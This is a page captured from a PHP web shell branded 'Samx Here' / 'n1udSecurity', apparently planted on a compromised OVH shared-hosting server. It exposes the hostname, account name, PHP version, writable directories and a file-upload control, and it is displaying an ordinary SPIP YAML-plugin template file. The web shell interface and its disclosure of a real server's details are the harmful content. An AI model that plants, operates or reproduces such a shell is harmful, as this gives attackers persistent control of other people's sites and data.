Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/god/plugins/auto/yaml/demo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/god/plugins/auto/yaml/demo/inc-decode_scan.html
#SET{dossier, #ENV{scan}/}
[(#ENV{scan}|=={pages}|oui)
	#SET{dossier, content/}
]
#SET{fichiers, #GET{dossier}|find_all_in_path{'.+[.]yaml$'}}

#SET{options, #ARRAY}
[(#ENV{scan}|=={noisettes}|oui)
	#SET{options, #GET{options}|array_merge{#ARRAY{include, #EVAL{true}}}}
]
<B_scans>
<h2 class="h2">YAML DECODE :[ TOUTES LES (#ENV{scan}|strtoupper) DISPONIBLES]</h2>
<table class="spip">
	<caption><strong>Comparaisons des tableaux issus du decodage</strong></caption>
	<thead>
		<tr class="row_first">
			<th>[(#ENV{scan}|ucfirst)]</th>
		<BOUCLE_head(DATA) {source table, #ENV{menu_librairies}}>
			<th>#VALEUR</th>
		</BOUCLE_head>
		</tr>
	</thead>
	<tbody>
<BOUCLE_scans(DATA) {source table, #GET{fichiers}}>
	#SET{comparaison, #VALEUR|comparer_decodage{#ENV{menu_librairies}|array_keys}, #GET{options}}
	<B_ligne_scan>
		<tr>
			<th>
				[(#_scans:CLE|basename{.yaml})]
			</th>
	<BOUCLE_ligne_scan(DATA) {source table, #GET{comparaison}}>
			<th>
				[(#VALEUR)]
			</th>
	</BOUCLE_ligne_scan>
		</tr>
	</B_ligne_scan>
</BOUCLE_scans>
	</tbody>
</table>
</B_scans>

SAMX